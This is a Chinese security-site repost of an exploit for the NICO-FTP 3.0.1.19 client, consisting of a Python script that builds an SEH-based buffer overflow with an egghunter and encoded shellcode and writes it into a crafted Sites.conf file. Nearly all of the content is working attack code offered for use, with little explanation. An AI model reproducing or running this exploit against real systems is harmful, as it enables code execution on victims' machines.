首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 NICO-FTP 3.0.1.19 - Buffer Overflow (SEH) (ASLR Bypass) 来源：vfocus.net 作者：Miguel 发布时间：2018-10-08   # Title: NICO-FTP 3.0.1.19 - Buffer Overflow (SEH)(ASLR) # Date: 2018-10-04 # Platforms: Windows # Author: Miguel Mendez Z # Vendor: Nico-FTP # Version: 3.0.1.19 # Tested on: Windows XP_sp3 [es]/ Windows 7_x86 [eng]   #!/usr/bin/python   import struct   # Bad Byte: \x0a\x0b\x0c\x0d\x0e\x0f\x5d happy = (     "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c"     "\x05\x5a\x74\xef\xb8\x30\x52\x31\x53\x8b\xfa\xaf\x75"     "\xea\xaf\x75\xe7\xff\xe7") happy += "\x90"*50   shell  = "\x30\x52\x31\x53"*2 # S1R0 shell += "\x90"*8 shell += (     "\x6a\x30\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13"     "\x25\xa8\xbe\x1c\x83\xeb\xfc\xe2\xf4\xd9\x40\x3c\x1c"     "\x25\xa8\xde\x95\xc0\x99\x7e\x78\xae\xf8\x8e\x97\x77"     "\xa4\x35\x4e\x31\x23\xcc\x34\x2a\x1f\xf4\x3a\x14\x57"     "\x12\x20\x44\xd4\xbc\x30\x05\x69\x71\x11\x24\x6f\x5c"     "\xee\x77\xff\x35\x4e\x35\x23\xf4\x20\xae\xe4\xaf\x64"     "\xc6\xe0\xbf\xcd\x74\x23\xe7\x3c\x24\x7b\x35\x55\x3d"     "\x4b\x84\x55\xae\x9c\x35\x1d\xf3\x99\x41\xb0\xe4\x67"     "\xb3\x1d\xe2\x90\x5e\x69\xd3\xab\xc3\xe4\x1e\xd5\x9a"     "\x69\xc1\xf0\x35\x44\x01\xa9\x6d\x7a\xae\xa4\xf5\x97"     "\x7d\xb4\xbf\xcf\xae\xac\x35\x1d\xf5\x21\xfa\x38\x01"     "\xf3\xe5\x7d\x7c\xf2\xef\xe3\xc5\xf7\xe1\x46\xae\xba"     "\x55\x91\x78\xc2\xbf\x91\xa0\x1a\xbe\x1c\x25\xf8\xd6"     "\x2d\xae\xc7\x39\xe3\xf0\x13\x4e\xa9\x87\xfe\xd6\xba"     "\xb0\x15\x23\xe3\xf0\x94\xb8\x60\x2f\x28\x45\xfc\x50"     "\xad\x05\x5b\x36\xda\xd1\x76\x25\xfb\x41\xc9\x46\xc9"     "\xd2\x7f\x25\xa8\xbe\x1c") shell += "\x90"*30   lol = "ftp.pwnd.com"+" "*50 padding = lol+"\x41"*(4132-(len(shell)+len(happy)+len(lol))) next_se = "\xEB\x90\x90\x90" seh_han = struct.pack("<I",0x00422B46) #pop ecx - pop ebp - ret 0x04 -> NicoFtp3.exe nops = " "*(4881-len(padding))   payload = padding+shell+happy+next_se+seh_han+nops   file = open('Sites.conf','w') file.write('['+payload+']\nHost=\nPort=\nUserName=\nPassword=\nAnonymous=1\nPassive=2\nUseProxy=1\nLocalDir=\nHostDir=\n') file.close()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·FTP Voyager 16.2.0 - Denial of ·ISPConfig < 3.1.13 - Remote Co ·H2 Database 1.4.196 - Remote C ·Easy File Sharing Web Server 7 ·Zahir Enterprise Plus 6 build ·Windows Net-NTLMv2 Reflection ·Snes9K 0.0.9z - Denial of Serv ·Navigate CMS Unauthenticated R ·Linux Kernel 2.6.x / 3.10.x / ·Zahir Enterprise Plus 6 Stack ·AppArmor Filesystem Blacklisti ·Unitrends UEB HTTP API Remote   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved